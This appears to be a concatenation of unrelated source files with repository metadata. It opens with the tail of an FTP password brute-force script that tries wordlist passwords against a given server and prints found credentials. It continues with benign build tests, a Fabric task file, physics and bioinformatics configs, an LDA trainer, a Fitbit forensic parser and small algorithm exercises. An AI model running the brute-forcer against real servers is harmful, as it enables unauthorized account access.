print "[!] Kullanici Adi : " + user
print "[!] Parola : " + passw
sys.exit(0)
except:
pass
def bruteForce(dstIP, user, wordL):
try:
wordlist = open(wordL, "r")
words = wordlist.readlines()
for word in words:
word = word.strip()
ftpLogin(dstIP, user, word)
except:
print "[-] Eslesen parola bulunamadi.."
sys.exit(0)
dstIP = raw_input("FTP sunucu adresi : ")
user = raw_input("Kullanici adi : ")
wordlist = raw_input("Parola listesi : ")
bruteForce(dstIP, user, wordlist)
checkAnonymous(dstIP)
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
d14bf3bde060c5cda07a825296dee074f729f51f
|
5db0fab37c2b8a618d85d3b60fab9f806c416474
|
/src/python/pants/backend/go/util_rules/build_pkg_test.py
|
be4d1f7e5dab9561e76f8e82e785b6d2d8bc7090
|
[
"Apache-2.0"
] |
permissive
|
pantsbuild/pants
|
4988d1ac5474ec95f94ce2218aeb759401e4b011
|
98cbda8545f0d58c586ed2daa76fefd729d5e0d5
|
refs/heads/main
| 2023-09-05T03:44:17.646899
| 2023-09-01T19:52:09
| 2023-09-01T19:52:09
| 7,209,075
| 2,708
| 593
|
Apache-2.0
| 2023-09-14T19:33:33
| 2012-12-17T17:39:04
|
Python
|
UTF-8
|
Python
| false
| false
| 6,371
|
py
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os.path
from textwrap import dedent
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.target_types import GoModTarget
from pants.backend.go.util_rules import (
assembly,
build_pkg,
first_party_pkg,
go_mod,
import_analysis,
link,
sdk,
third_party_pkg,
)
from pants.backend.go.util_rules.build_opts import GoBuildOptions
from pants.backend.go.util_rules.build_pkg import (
BuildGoPackageRequest,
BuiltGoPackage,
FallibleBuiltGoPackage,
)
from pants.engine.fs import Snapshot
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import RuleRunner
from pants.util.strutil import path_safe
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*sdk.rules(),
*assembly.rules(),
*build_pkg.rules(),
*import_analysis.rules(),
*go_mod.rules(),
*first_party_pkg.rules(),
*link.rules(),
*third_party_pkg.rules(),
*target_type_rules.rules(),
QueryRule(BuiltGoPackage, [BuildGoPackageRequest]),
QueryRule(FallibleBuiltGoPackage, [BuildGoPackageRequest]),
],
target_types=[GoModTarget],
)
rule_runner.set_options([], env_inherit={"PATH"})
return rule_runner
def assert_built(
rule_runner: RuleRunner, request: BuildGoPackageRequest, *, expected_import_paths: list[str]
) -> None:
built_package = rule_runner.request(BuiltGoPackage, [request])
result_files = rule_runner.request(Snapshot, [built_package.digest]).files
expected = {
import_path: os.path.join("__pkgs__", path_safe(import_path), "__pkg__.a")
for import_path in expected_import_paths
}
assert dict(built_package.import_paths_to_pkg_a_files) == expected
assert sorted(result_files) == sorted(expected.values())
def test_build_pkg(rule_runner: RuleRunner) -> None:
transitive_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep/transitive",
pkg_name="transitive",
dir_path="dep/transitive",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"dep/transitive/f.go": dedent(
"""\
package transitive
func Quote(s string) string {
return ">>" + s + "<<"
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(),
minimum_go_version=None,
)
direct_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep",
pkg_name="dep",
dir_path="dep",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"dep/f.go": dedent(
"""\
package dep
import "example.com/foo/dep/transitive"
func Quote(s string) string {
return transitive.Quote(s)
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(transitive_dep,),
minimum_go_version=None,
)
main = BuildGoPackageRequest(
import_path="example.com/foo",
pkg_name="foo",
dir_path="",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"f.go": dedent(
"""\
package foo
import "example.com/foo/dep"
func main() {
dep.Quote("Hello world!")
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(direct_dep,),
minimum_go_version=None,
)
assert_built(
rule_runner, transitive_dep, expected_import_paths=["example.com/foo/dep/transitive"]
)
assert_built(
rule_runner,
direct_dep,
expected_import_paths=["example.com/foo/dep", "example.com/foo/dep/transitive"],
)
assert_built(
rule_runner,
main,
expected_import_paths=[
"example.com/foo",
"example.com/foo/dep",
"example.com/foo/dep/transitive",
],
)
def test_build_invalid_pkg(rule_runner: RuleRunner) -> None:
invalid_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep",
pkg_name="dep",
dir_path="dep",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot({"dep/f.go": "invalid!!!"}).digest,
s_files=(),
direct_dependencies=(),
minimum_go_version=None,
)
main = BuildGoPackageRequest(
import_path="example.com/foo",
pkg_name="main",
dir_path="",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"f.go": dedent(
"""\
package main
import "example.com/foo/dep"
func main() {
dep.Quote("Hello world!")
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(invalid_dep,),
minimum_go_version=None,
)
invalid_direct_result = rule_runner.request(FallibleBuiltGoPackage, [invalid_dep])
assert invalid_direct_result.output is None
assert invalid_direct_result.exit_code == 1
assert (
invalid_direct_result.stdout
== "dep/f.go:1:1: syntax error: package statement must be first\n"
)
invalid_dep_result = rule_runner.request(FallibleBuiltGoPackage, [main])
assert invalid_dep_result.output is None
assert invalid_dep_result.exit_code == 1
assert (
invalid_dep_result.stdout == "dep/f.go:1:1: syntax error: package statement must be first\n"
)
|
[
"noreply@github.com"
] |
pantsbuild.noreply@github.com
|
f6bc336f85c826b416c7a82c6d5707a2e558c142
|
cad999eacee16dc0e001a57f50b5d8b0f4d4ebf6
|
/p202.py
|
a2cc8d0b585a2940e0c568ce938cd4db057be5f3
|
[] |
no_license
|
divyanarra0/pythonprogram
|
8694a41ba3b39eb44a94a693eac3f7f5f18b588b
|
10d8f59a472ccd4548771bad29be84a1a44854d8
|
refs/heads/master
| 2020-03-27T10:32:21.664657
| 2019-05-14T07:31:00
| 2019-05-14T07:31:00
| 146,427,260
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 723
|
py
|
def isVowel(c):
c = c.lower()
if (c == 'a' or c == 'e' or
c == 'i' or c == 'o' or c == 'u'):
return True
return False
# Function to return first X vowels
def firstXvowels(s, x):
# String to store first X vowels
result = ""
for i in range(0, len(s), 1):
# If s[i] is a vowel then
# append it to the result
if (isVowel(s[i])):
result += s[i]
# If the desired length is reached
if (len(result) == x):
return result
# If total vowels are < X
return "-1"
# Driver code
if __name__ == '__main__':
str = "asdaqrew"
x = 3
print(firstXvowels(str, x))
|
[
"noreply@github.com"
] |
divyanarra0.noreply@github.com
|
751cf05a4a081982c332d1d32c6bfbd742ac75f9
|
40ca01569e9c8ed6d2312447fac604229bdeace3
|
/fabfile.py
|
bb0342de308a2dc2d08064b855fa24d83163edb7
|
[
"MIT"
] |
permissive
|
deniskrumko/izyan-poker
|
c393c9c4cb401d3180a97075fde59ff2e371a77d
|
ce70c9c8f761409adad289809e5220237b312407
|
refs/heads/master
| 2021-06-14T08:59:03.364660
| 2020-02-11T06:48:00
| 2020-02-11T06:48:00
| 200,377,031
| 7
| 2
|
MIT
| 2021-06-10T18:43:43
| 2019-08-03T13:11:06
|
Python
|
UTF-8
|
Python
| true
| false
| 3,424
|
py
|
from fabric.api import task, local
def print_msg(msg, error=False):
"""Print message in console."""
def green_msg(msg):
"""Make message green color in console."""
return '\033[92m{0}\033[00m'.format(msg)
def red_msg(msg):
"""Make message red color in console."""
return '\033[91m{0}\033[00m'.format(msg)
print_function = red_msg if error else green_msg
print(print_function('\n{}\n'.format(msg)))
# MAIN COMMANDS
# ============================================================================
@task
def manage(command):
"""Run ``python3 manage.py`` command."""
return local('python3 manage.py {}'.format(command))
@task
def run():
"""Run server."""
return manage('runserver')
@task
def shell():
"""Run server."""
return manage('shell_plus')
# GIT
# ============================================================================
@task
def push(force=False):
"""Push changes to all servers."""
force = ' --force' if force else ''
print_msg('1. Pushing to origin')
local(f'git push origin master --tags{force}')
print_msg('2. Pushing to Heroku')
local(f'git push heroku master{force}')
# LOCALES
# ============================================================================
@task
def makemessages():
"""Make messages."""
return manage('makemessages -l ru --no-location')
@task
def compilemessages():
"""Compile messages."""
return manage('compilemessages')
# MIGRATIONS AND DATABASE
# ============================================================================
@task
def makemigrations():
"""Make migrations for database."""
manage('makemigrations')
@task
def migrate():
"""Apply migrations to database."""
print_msg('Applying migrations')
manage('migrate')
@task
def createsuperuser(email='root@root.ru'):
"""Create superuser with default credentials."""
print_msg('Creating superuser')
return manage('createsuperuser --username root --email {}'.format(email))
@task
def resetdb():
"""Reset database to initial state."""
print_msg('Remove "scr/media" folder')
local('rm -rf media/')
print_msg('Reset database')
manage('reset_db -c --noinput')
migrate()
createsuperuser()
# STATIC CHECKS: ISORT AND PEP8
# ============================================================================
@task
def isort():
"""Fix imports formatting."""
print_msg('Running imports fix')
local('isort apps config -y -rc')
@task
def pep8(path='apps core'):
"""Check PEP8 errors."""
print_msg('Checking PEP8 errors')
return local('flake8 --config=.flake8 {}'.format(path))
# PIPENV
# ============================================================================
@task
def lock():
"""Lock requirements."""
print_msg('Locking requirements')
local('pipenv lock')
@task
def install():
"""Install requirements."""
print_msg('Installing DEV requirements')
local('pipenv install --dev')
# HEROKU
# ============================================================================
@task
def logs():
local('heroku logs --source app --tail')
@task
def scale(value=1):
local(f'heroku ps:scale web={value}')
@task
def ps():
local(f'heroku ps')
@task
def runweb():
local(f'heroku local web -f Procfile.local')
@task
def python(command):
local(f'heroku run python {command}')
|
[
"dkrumko@gmail.com"
] |
dkrumko@gmail.com
|
4fd52351a670070b2a03c71c3135823c46cdb129
|
4526ed71f39d70111c3787ec90b4932a183c452c
|
/2016/Pyquen_WToMuNu_TuneZ2_8160GeV_pythia6_reverse_cfi.py
|
f47777dec69a0a32fa2aa7721bb9c36a5c2f145d
|
[] |
no_license
|
CMS-HIN-dilepton/MCRequest
|
773f414739efc529dc957a044232478b1c4f1c03
|
ff49d22fde2c4a006fe7fa02d4cf53d794f91888
|
refs/heads/master
| 2021-05-02T12:16:51.891664
| 2020-06-20T18:35:52
| 2020-06-20T18:35:52
| 45,127,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,712
|
py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.PythiaUEZ2Settings_cfi import *
generator = cms.EDFilter("PyquenGeneratorFilter",
comEnergy = cms.double(8160.0),
aBeamTarget = cms.double(208.0),
protonSide = cms.untracked.int32(2),
qgpInitialTemperature = cms.double(1.0), ## initial temperature of QGP; allowed range [0.2,2.0]GeV;
qgpProperTimeFormation = cms.double(0.1), ## proper time of QGP formation; allowed range [0.01,10.0]fm/c;
hadronFreezoutTemperature = cms.double(0.14),
doRadiativeEnLoss = cms.bool(True), ## if true, perform partonic radiative en loss
doCollisionalEnLoss = cms.bool(False),
qgpNumQuarkFlavor = cms.int32(0), ## number of active quark flavors in qgp; allowed values: 0,1,2,3
numQuarkFlavor = cms.int32(0), ## to be removed
doIsospin = cms.bool(True),
angularSpectrumSelector = cms.int32(0), ## angular emitted gluon spectrum :
embeddingMode = cms.bool(False),
backgroundLabel = cms.InputTag("generator"), ## ineffective in no mixing
doQuench = cms.bool(False),
bFixed = cms.double(0.0), ## fixed impact param (fm); valid only if cflag_=0
cFlag = cms.int32(0), ## centrality flag
bMin = cms.double(0.0), ## min impact param (fm); valid only if cflag_!=0
bMax = cms.double(0.0), ## max impact param (fm); valid only if cflag_!=0
pythiaPylistVerbosity = cms.untracked.int32(1),
pythiaHepMCVerbosity = cms.untracked.bool(True),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(pythiaUESettingsBlock,
processParameters = cms.vstring('MSEL = 0 !User defined processes',
'MSUB(2) = 1 !W production',
'MDME(190,1) = 0 !W decay into dbar u',
'MDME(191,1) = 0 !W decay into dbar c',
'MDME(192,1) = 0 !W decay into dbar t',
'MDME(194,1) = 0 !W decay into sbar u',
'MDME(195,1) = 0 !W decay into sbar c',
'MDME(196,1) = 0 !W decay into sbar t',
'MDME(198,1) = 0 !W decay into bbar u',
'MDME(199,1) = 0 !W decay into bbar c',
'MDME(200,1) = 0 !W decay into bbar t',
'MDME(205,1) = 0 !W decay into bbar tp',
'MDME(206,1) = 0 !W decay into e+ nu_e',
'MDME(207,1) = 1 !W decay into mu+ nu_mu',
'MDME(208,1) = 0 !W decay into tau+ nu_tau'),
parameterSets = cms.vstring('pythiaUESettings',
'processParameters')
)
)
configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.1 $'),
name = cms.untracked.string('$Source: /cvs_server/repositories/CMSSW/CMSSW/Configuration/GenProduction/python/HI/Pyquen_WToMuNu_TuneZ2_5023GeV_pythia6_cfi.py,v $'),
annotation = cms.untracked.string('PYQUEN-Wmunu Tune Z2 at 5.023 TeV')
)
#ProductionFilterSequence = cms.Sequence(hiSignal)
ProductionFilterSequence = cms.Sequence(generator)
|
[
"emilien.chapon@cern.ch"
] |
emilien.chapon@cern.ch
|
b05505c9b445af3674a860fe8d4fd78dda734376
|
b9cd1b9758e58f00335900fd120e1d47c23600ce
|
/tests/test_pipeline_chipseq.py
|
543d39616238213767af72ed8a467fa36a735e65
|
[
"Apache-2.0"
] |
permissive
|
Multiscale-Genomics/mg-process-fastq
|
4fb7fef68526237f06312a3f137df031a448731c
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
refs/heads/master
| 2020-04-12T06:46:01.100270
| 2018-11-19T16:05:03
| 2018-11-19T16:05:03
| 64,320,140
| 2
| 4
|
Apache-2.0
| 2018-11-16T16:54:54
| 2016-07-27T15:29:25
|
Python
|
UTF-8
|
Python
| false
| false
| 7,060
|
py
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import pytest
from basic_modules.metadata import Metadata
from process_chipseq import process_chipseq
@pytest.mark.chipseq
@pytest.mark.pipeline
def test_chipseq_pipeline_00():
"""
Test case to ensure that the ChIP-seq pipeline code works.
Running the pipeline with the test data from the command line:
.. code-block:: none
runcompss \\
--lang=python \\
--library_path=${HOME}/bin \\
--pythonpath=/<pyenv_virtenv_dir>/lib/python2.7/site-packages/ \\
--log_level=debug \\
process_chipseq.py \\
--taxon_id 9606 \\
--genome /<dataset_dir>/Human.GCA_000001405.22.fasta \\
--assembly GRCh38 \\
--file /<dataset_dir>/DRR000150.22.fastq
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
files = {
'genome': resource_path + 'macs2.Human.GCA_000001405.22.fasta',
'loc': resource_path + 'macs2.Human.DRR000150.22.fastq',
'index': resource_path + 'macs2.Human.GCA_000001405.22.fasta.bwa.tar.gz'
}
metadata = {
"genome": Metadata(
"Assembly", "fasta", files['genome'], None,
{'assembly': 'GCA_000001405.22'}),
"loc": Metadata(
"data_chip_seq", "fastq", files['loc'], None,
{'assembly': 'GCA_000001405.22'}
),
"index": Metadata(
"Index", "bwa_index", files['index'], files['genome'],
{'assembly': 'GCA_000001405.22', "tool": "bwa_indexer"}),
}
root_name = files['loc'].split("/")
root_name[-1] = root_name[-1].replace('.fastq', '')
files_out = {
"bam": files['loc'].replace(".fastq", ".bam"),
"bai": files['loc'].replace(".fastq", ".bai"),
"filtered": files['loc'].replace(".fastq", "_filtered.bam"),
"output": files['loc'].replace(".fastq", ".tsv"),
'narrow_peak': '/'.join(root_name) + '_filtered_peaks.narrowPeak',
'summits': '/'.join(root_name) + '_filtered_summits.bed',
'broad_peak': '/'.join(root_name) + '_filtered_peaks.broadPeak',
'gapped_peak': '/'.join(root_name) + '_filtered_peaks.gappedPeak'
}
chipseq_handle = process_chipseq({"macs_nomodel_param": True, "execution": resource_path})
chipseq_files, chipseq_meta = chipseq_handle.run(files, metadata, files_out) # pylint: disable=unused-variable
print(chipseq_files)
# Add tests for all files created
for f_out in chipseq_files:
print("CHIP-SEQ RESULTS FILE:", f_out)
# assert chipseq_files[f_out] == files_out[f_out]
assert os.path.isfile(chipseq_files[f_out]) is True
assert os.path.getsize(chipseq_files[f_out]) > 0
try:
os.remove(chipseq_files[f_out])
except OSError as ose:
print("Error: %s - %s." % (ose.filename, ose.strerror))
@pytest.mark.chipseq
@pytest.mark.pipeline
def test_chipseq_pipeline_01():
"""
Test case to ensure that the ChIP-seq pipeline code works.
Running the pipeline with the test data from the command line:
.. code-block:: none
runcompss \\
--lang=python \\
--library_path=${HOME}/bin \\
--pythonpath=/<pyenv_virtenv_dir>/lib/python2.7/site-packages/ \\
--log_level=debug \\
process_chipseq.py \\
--taxon_id 9606 \\
--genome /<dataset_dir>/Human.GCA_000001405.22.fasta \\
--assembly GRCh38 \\
--file /<dataset_dir>/DRR000150.22.fastq
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
files = {
'genome_public': resource_path + 'macs2.Human.GCA_000001405.22.fasta',
'loc': resource_path + 'macs2.Human.DRR000150.22.fastq',
'index_public': resource_path + 'macs2.Human.GCA_000001405.22.fasta.bwa.tar.gz'
}
metadata = {
"genome_public": Metadata(
"Assembly", "fasta", files['genome_public'], None,
{'assembly': 'GCA_000001405.22'}),
"loc": Metadata(
"data_chip_seq", "fastq", files['loc'], None,
{'assembly': 'GCA_000001405.22'}
),
"index_public": Metadata(
"Index", "bwa_index", files['index_public'], files['genome_public'],
{'assembly': 'GCA_000001405.22', "tool": "bwa_indexer"}),
}
root_name = files['loc'].split("/")
root_name[-1] = root_name[-1].replace('.fastq', '')
files_out = {
"bam": files['loc'].replace(".fastq", ".bam"),
"bai": files['loc'].replace(".fastq", ".bai"),
"filtered": files['loc'].replace(".fastq", "_filtered.bam"),
"output": files['loc'].replace(".fastq", ".tsv"),
'narrow_peak': '/'.join(root_name) + '_filtered_peaks.narrowPeak',
'summits': '/'.join(root_name) + '_filtered_summits.bed',
'broad_peak': '/'.join(root_name) + '_filtered_peaks.broadPeak',
'gapped_peak': '/'.join(root_name) + '_filtered_peaks.gappedPeak'
}
chipseq_handle = process_chipseq({"macs_nomodel_param": True, "execution": resource_path})
chipseq_files, chipseq_meta = chipseq_handle.run(files, metadata, files_out) # pylint: disable=unused-variable
print(chipseq_files)
# Add tests for all files created
for f_out in chipseq_files:
print("CHIP-SEQ RESULTS FILE:", f_out)
# assert chipseq_files[f_out] == files_out[f_out]
assert os.path.isfile(chipseq_files[f_out]) is True
assert os.path.getsize(chipseq_files[f_out]) > 0
try:
os.remove(chipseq_files[f_out])
except OSError as ose:
print("Error: %s - %s." % (ose.filename, ose.strerror))
|
[
"mark.mcdowall@gmail.com"
] |
mark.mcdowall@gmail.com
|
c4e2b115dbe1fb2ca6e5626b223b88a4f3dde73e
|
b0e67fbd4c42aba24f7d4bccb99e9aa037c0b7d5
|
/lda/train_LDA.py
|
39ade7589cc4a9b7f6176b106691125a03142547
|
[] |
no_license
|
gombru/SocialMediaWeakLabeling
|
f979aea8218be115758ff8e1e9a945a701ac99b9
|
518437903ba7370a4098303a41196a08f1d6a58e
|
refs/heads/master
| 2022-02-26T17:49:08.997335
| 2022-02-10T12:54:57
| 2022-02-10T12:54:57
| 84,461,511
| 15
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,004
|
py
|
# Trains and saves an LDA model with the given text files.
from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
from nltk.stem.porter import PorterStemmer
from gensim import corpora, models
import glob
import string
import random
import numpy as np
whitelist = string.letters + string.digits + ' '
instagram_text_data_path = '../../../datasets/SocialMedia/captions_resized_1M/cities_instagram/'
model_path = '../../../datasets/SocialMedia/models/LDA/lda_model_cities_instagram_1M_500_5000chunck.model'
words2filter = ['rt','http','t','gt','co','s','https','http','tweet','markars_','photo','pictur','picture','say','photo','much','tweet','now','blog']
cities = ['london','newyork','sydney','losangeles','chicago','melbourne','miami','toronto','singapore','sanfrancisco']
num_topics = 500
threads = 8
passes = 1 #Passes over the whole corpus
chunksize = 5000 #Update the model every 10000 documents
# See https://radimrehurek.com/gensim/wiki.html
update_every = 1
repetition_threshold = 20
#Initialize Tokenizer
tokenizer = RegexpTokenizer(r'\w+')
# create English stop words list
en_stop = get_stop_words('en')
# add own stop words
for w in words2filter:
en_stop.append(w)
# Create p_stemmer of class PorterStemmer
p_stemmer = PorterStemmer()
posts_text = []
texts = [] #List of lists of tokens
# -- LOAD DATA FROM INSTAGRAM --
for city in cities:
print "Loading data from " + city
for file_name in glob.glob(instagram_text_data_path + city + "/*.txt"):
caption = ""
filtered_caption = ""
file = open(file_name, "r")
for line in file:
caption = caption + line
# Replace hashtags with spaces
caption = caption.replace('#', ' ')
# Keep only letters and numbers
for char in caption:
if char in whitelist:
filtered_caption += char
posts_text.append(filtered_caption.decode('utf-8').lower())
# print filtered_caption.decode('utf-8')
print "Number of posts: " + str(len(posts_text))
print "Creating tokens"
c= 0
for t in posts_text:
c += 1
if c % 10000 == 0:
print c
try:
t = t.lower()
tokens = tokenizer.tokenize(t)
# remove stop words from tokens
stopped_tokens = [i for i in tokens if not i in en_stop]
# stem token
text = [p_stemmer.stem(i) for i in stopped_tokens]
# add proceced text to list of lists
texts.append(text)
except:
continue
#Remove element from list if memory limitation TODO
#del tweets_text[0]
posts_text = []
# Remove words that appear less than N times
print "Removing words appearing less than: " + str(repetition_threshold)
from collections import defaultdict
frequency = defaultdict(int)
for text in texts:
for token in text:
frequency[token] += 1
texts = [[token for token in text if frequency[token] > repetition_threshold] for text in texts]
# Construct a document-term matrix to understand how frewuently each term occurs within each document
# The Dictionary() function traverses texts, assigning a unique integer id to each unique token while also collecting word counts and relevant statistics.
# To see each token unique integer id, try print(dictionary.token2id)
dictionary = corpora.Dictionary(texts)
print(dictionary)
# TODO check this
# dictionary.compactify()
# Filter out tokens that appear in less than no_below documents (absolute number) or more than no_above documents (fraction of total corpus size, not absolute number).
# after (1) and (2), keep only the first keep_n most frequent tokens (or keep all if None).
# dictionary.filter_extremes(no_below=no_below, no_above=no_above, keep_n=None)
# dictionary.compactify() # remove gaps in id sequence after words that were removed
# Convert dictionary to a BoW
# The result is a list of vectors equal to the number of documents. Each document containts tumples (term ID, term frequency)
corpus = [dictionary.doc2bow(text) for text in texts]
texts = []
#Randomize training elements
corpus = np.random.permutation(corpus)
# Generate an LDA model
print "Creating LDA model"
# the minimum_probability=0 argument is necessary in order for
# gensim to return the full document-topic-distribution matrix. If
# this argument is omitted and left to the gensim default of 0.01,
# then all document-topic weights below that threshold will be
# returned as NaN, violating the subsequent LDAvis assumption that
# all rows (documents) in the document-topic-distribution matrix sum
# to 1.
#ldamodel = models.ldamodel.LdaModel(corpus, num_topics=num_topics, id2word = dictionary, passes=passes, minimum_probability=0)
ldamodel = models.LdaMulticore(corpus, num_topics=num_topics, id2word = dictionary, chunksize=chunksize, passes=passes, workers=threads, minimum_probability=0)
ldamodel.save(model_path)
# Our LDA model is now stored as ldamodel
print(ldamodel.print_topics(num_topics=8, num_words=10))
print "DONE"
|
[
"raulgombru@gmail.com"
] |
raulgombru@gmail.com
|
09b194ff61b3e409331b5fb117555aaaa998c26a
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/find_max_20200722114432.py
|
63139ffb63e0f85ee0899b804e0ff82130382654
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 190
|
py
|
items = [6,20,8,19,56,23,87,41,49,53]
def find_max(items):
# Breaking condition
if len(items) == 1:
return items[0]
op1 = items[0]
op2 = find_max(items[1:])
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
907769470c06a9adb96a73b04f9ea62d43e0d19c
|
0ee4debe412b996de7f5a592800515ae7104c5a5
|
/scripts/artifacts/fitbitHeart.py
|
6710cc413d11222ce7d902507ea13b4b8ec52313
|
[
"MIT"
] |
permissive
|
kibaffo33/ALEAPP
|
af7eebd9d4ab078c57c4108ebab0c80c89df8630
|
ca50b7d665dccb846ff601b7b797d754eb8100d9
|
refs/heads/master
| 2022-06-15T03:55:37.407875
| 2022-06-13T20:39:47
| 2022-06-13T20:39:47
| 243,058,738
| 1
| 0
| null | 2020-02-25T17:29:43
| 2020-02-25T17:29:36
| null |
UTF-8
|
Python
| false
| false
| 1,477
|
py
|
import sqlite3
import textwrap
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, open_sqlite_db_readonly
def get_fitbitHeart(files_found, report_folder, seeker, wrap_text):
file_found = str(files_found[0])
db = open_sqlite_db_readonly(file_found)
cursor = db.cursor()
cursor.execute('''
SELECT
datetime("DATE_TIME"/1000, 'unixepoch'),
AVERAGE_HEART_RATE,
RESTING_HEART_RATE
FROM HEART_RATE_DAILY_SUMMARY
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
report = ArtifactHtmlReport('Fitbit Heart Rate Summary')
report.start_artifact_report(report_folder, 'Fitbit Heart Rate Summary')
report.add_script()
data_headers = ('Timestamp','Avg. Heart Rate','Resting Heart Rate')
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2]))
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = f'Fitbit Heart Rate Summary'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = f'Fitbit Heart Rate Summary'
timeline(report_folder, tlactivity, data_list, data_headers)
else:
logfunc('No Fitbit Heart Rate Summary data available')
db.close()
|
[
"abrignoni@gmail.com"
] |
abrignoni@gmail.com
|
9d3f1e1eaaf40864ef9e266b4fd7d25f9d328b21
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/mYGipMffRTYxYmv5i_3.py
|
1c5ebcf46c86f6f779f84e38b73917754d45490f
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,929
|
py
|
import itertools
def simple_equation(a,b,c):
numbers = [a,b,c]
for eachcombo in itertools.permutations(numbers,2):
first_num = eachcombo[0]
second_num = eachcombo[1]
if c != first_num and c != second_num:
if first_num + second_num == c:
return '{}+{}={}'.format(first_num,second_num,c)
elif first_num - second_num == c:
return '{}-{}={}'.format(first_num,second_num,c)
elif first_num * second_num == c:
return '{}*{}={}'.format(first_num,second_num,c)
try:
if first_num // second_num == c:
return '{}/{}={}'.format(first_num,second_num,c)
except Exception as e:
continue
elif b != first_num and b != second_num:
if first_num + second_num == b:
return '{}+{}={}'.format(first_num,second_num,b)
elif first_num - second_num == b:
return '{}-{}={}'.format(first_num,second_num,b)
elif first_num * second_num == b:
return '{}*{}={}'.format(first_num,second_num,b)
try:
if first_num // second_num == b:
return '{}/{}={}'.format(first_num,second_num,b)
except Exception as e:
continue
elif a != first_num and a != second_num:
if first_num + second_num == a:
return '{}+{}={}'.format(first_num,second_num,a)
elif first_num - second_num == a:
return '{}-{}={}'.format(first_num,second_num,a)
elif first_num * second_num == a:
return '{}*{}={}'.format(first_num,second_num,a)
try:
if first_num // second_num == a:
return '{}/{}={}'.format(first_num,second_num,a)
except Exception as e:
continue
return ''
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
f71f89c4c19d7d8045d9c586cb80e5b3176cf92f
|
ec53949dafa4b6ad675d679b05ed7c83fef2c69a
|
/DataStructuresAndAlgo/SortAlgo/QuickSort/QuickSort.py
|
ec6d49ec37082d18b789ab13db62a63fe2db4d61
|
[] |
no_license
|
tpotjj/Python
|
9a5a20a53cd7a6ec14386c1db8ce155e0fc9ab8a
|
ca73c116ada4d05c0c565508163557744c86fc76
|
refs/heads/master
| 2023-07-11T16:37:10.039522
| 2021-08-14T11:17:55
| 2021-08-14T11:17:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 610
|
py
|
def partition(CustomList, low, high):
i = low -1
pivot = CustomList[high]
for j in range(low, high):
if CustomList[j] <= pivot:
i += 1
CustomList[i], CustomList[j] = CustomList[j], CustomList[i]
CustomList[i+1], CustomList[high] = CustomList[high], CustomList[i+1]
return (i+1)
def Quicksort(CustomList, low, high):
if low < high:
pi = partition(CustomList, low, high)
Quicksort(CustomList, low, pi-1)
Quicksort(CustomList, pi+1, high)
BasicList = [2, 6, 4, 8, 1, 3]
print(BasicList)
Quicksort(BasicList, 0, 5)
print(BasicList)
|
[
"joris97jansen@gmail.com"
] |
joris97jansen@gmail.com
|
f155e40ab83b0e0703d0bfe760ae2c41de4fcdb7
|
e5e9ee9e4db2e400e7f87647501ee412c13d76e5
|
/python/python-base/turtle/fun.py
